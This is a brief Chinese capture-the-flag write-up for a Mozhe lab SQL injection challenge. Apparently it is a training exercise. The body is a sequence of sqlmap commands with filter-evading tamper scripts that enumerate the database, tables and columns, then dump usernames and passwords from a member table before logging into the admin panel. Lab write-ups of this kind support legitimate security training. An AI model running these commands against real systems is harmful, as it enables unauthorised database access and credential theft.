https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

SQL过滤字符后手工注入漏洞测试(第1题)

 

分析题目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!!

 

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

SQL过滤字符后手工注入漏洞测试(第1题)

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

SQL过滤字符后手工注入漏洞测试(第1题)

 

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

SQL过滤字符后手工注入漏洞测试(第1题)

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

SQL过滤字符后手工注入漏洞测试(第1题)

SQL过滤字符后手工注入漏洞测试(第1题)

 

 登录后台,获取flag,提交即可

 

相关文章:

  • 2022-12-23
  • 2021-08-16
  • 2022-12-23
  • 2021-05-27
  • 2022-12-23
  • 2021-12-14
  • 2021-07-08
  • 2021-06-30
猜你喜欢
  • 2021-05-26
  • 2021-09-28
  • 2021-04-24
  • 2021-08-30
  • 2022-12-23
  • 2021-11-01
相关资源
相似解决方案